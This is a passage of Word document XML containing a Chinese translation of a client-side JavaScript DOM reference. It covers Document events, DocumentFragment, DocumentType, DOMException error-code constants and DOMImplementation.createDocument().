        <w:t>＞标签的内容时，这个方法可能会有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器不常直接在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发事件，不过</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>事件会冒泡到包含它们的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>上，因此，</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象支持所有</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>中列出的事件处理程序属性。和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>Docuemnt</w:t>
      </w:r>
      <w:r>
        <w:t>对象也实现</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>浏览器确实会在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发两个文档就绪事件。当</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性改</w:t>
      </w:r>
      <w:r>
        <w:t>变时，浏览器触发</w:t>
      </w:r>
      <w:r>
        <w:t>readystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>事件，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册这个事件的处理程序。当文档树就绪（但在外部资源下载完之前）时，浏览器也会触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>事件（参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），但是注册这个事件只能用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因为有一个</w:t>
      </w:r>
      <w:r>
        <w:t>onDOMContentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="809" w:name="DocumentFragment"/>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>相邻的节点及它们的子树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>接口表示文档的一个部分或一个碎片，具体一点来说，它是由相邻节点</w:t>
      </w:r>
      <w:r>
        <w:t>以及每个节点的子孙组成的一个列表，但这些节点没有一个共同的父节点。</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点永远不会是某个文档树的一部分，它继承的</w:t>
      </w:r>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:r>
        <w:t>属性总是为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。不过，</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点展现出了一个非常有用的性质：把一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>插入到一个文档树时，插入的不是</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点本身，而是这个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个子节点。这让</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>可以用做临时占位符，先将希望插入的节点放入其中，然后将它们一</w:t>
      </w:r>
      <w:r>
        <w:t>次性地插入到文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createDocumentFragment()</w:t>
      </w:r>
      <w:r>
        <w:t>来创建一个新的空</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以在</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>中使用</w:t>
      </w:r>
      <w:r>
        <w:t>querySelector()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>来搜索元素，它们的表现和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的相同方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element querySelector(string selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Document.querySelector()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList querySelectorAl</w:t>
      </w:r>
      <w:r>
        <w:t>l(string selectors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>Document.querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="DocumentType"/>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:bookmarkEnd w:id="810"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞声明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个不常用的类型表示文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞声明。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>doctype</w:t>
      </w:r>
      <w:r>
        <w:t>属性保存该文档的</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点是不可变的，无法对其进行修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点用于通过</w:t>
      </w:r>
      <w:r>
        <w:t>DOMImplementation.createDocument()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>DO</w:t>
      </w:r>
      <w:r>
        <w:t>MImplementation.createDocumentType()</w:t>
      </w:r>
      <w:r>
        <w:t>创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档类型的名称。这个标识符在文档开头紧跟着＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞，和文档的根元素的标签名相同。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档而言，这个值是</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string publicId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
      <w:r>
        <w:t>的公共标识符，如果未定义则为空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly string systemId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DTD</w:t>
      </w:r>
      <w:r>
        <w:t>的系统标识符，如果未定义则为空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="811" w:name="DOMException"/>
      <w:r>
        <w:t>DOMException</w:t>
      </w:r>
      <w:bookmarkEnd w:id="811"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web API</w:t>
      </w:r>
      <w:r>
        <w:t>抛出的异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>在需要发出错误信号时会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>DOMException</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个对象的</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性提供了关于这个错误的更多信息。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>DOMException</w:t>
      </w:r>
      <w:r>
        <w:t>可能会在读或写一个对象的属性或调用一个对象的方法时抛出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMException</w:t>
      </w:r>
      <w:r>
        <w:t>不是核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript Error</w:t>
      </w:r>
      <w:r>
        <w:t>类型的子类，不过两者很相似，一些浏览器包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>属性，以便让它与</w:t>
      </w:r>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:t>兼容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short INDEX_SIZE_ERR=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsig</w:t>
      </w:r>
      <w:r>
        <w:t>ned short HIERARCHY_REQUEST_ERR=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short WRONG_DOCUMENT_ERR=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short INVALID_CHARACTER_ERR=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short NO_MODIFICATION_ALLOWED_ERR=7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NOT_FOUND_ERR=8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NOT_SUPPORTED_ERR=9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short INVALID_STATE_ERR=11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short SYNTAX_ERR=12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short INVALID_MODIFICATION_ERR=13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NAMESPACE_ERR=14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short INVALID_ACCESS_ERR=15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short TYPE_MISMATCH_ERR=17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short SECURITY_ERR=18</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NETWORK_ERR=19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short ABO</w:t>
      </w:r>
      <w:r>
        <w:t>RT_ERR=20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short URL_MISMATCH_ERR=21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short QUOTA_EXCEEDED_ERR=22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short TIMEOUT_ERR=23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short DATA_CLONE_ERR=25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些是</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值。常量的名字已经足以说明抛出异常的大致原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面列出的常量值中的一个，指出发生了什么类型的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定异常类型的名字。上面列出的常量名中的一个，字符串形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="812" w:name="DOMImplementation"/>
      <w:r>
        <w:t>DOMImplementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="812"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>DOMImplementation</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义一些不与任何特定</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象相关的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用于</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>的实现。可通过任何</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>implementation</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取</w:t>
      </w:r>
      <w:r>
        <w:t>DOMImplementation</w:t>
      </w:r>
      <w:r>
        <w:t>对象的引用。</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Document createDocument(string namespace,string qualifedName,DocumentType doctype</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法创建并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>XML Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>qualifiedName</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法将以它为名字创建一个根节点，并将作为其</w:t>
      </w:r>
      <w:r>
        <w:t>documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>添加到文档中。如果</w:t>
      </w:r>
      <w:r>
        <w:t>qualifeldName</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个命名空间前缀和一个逗号，</w:t>
      </w:r>
      <w:r>
        <w:t>namespace</w:t>
      </w:r>
      <w:r>
        <w:t>将作为唯一标识命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>。如果参数</w:t>
      </w:r>
      <w:r>
        <w:t>doctype</w:t>
      </w:r>
      <w:r>
        <w:t>不为空，则当前</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>ownerDocument</w:t>
      </w:r>
      <w:r>
        <w:t>属性将设置为这个新创建的文档，</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentType</w:t>
      </w:r>
      <w:r>
        <w:t>节点将添加到这个新文档中。</w:t>
      </w:r>
    </w:p>
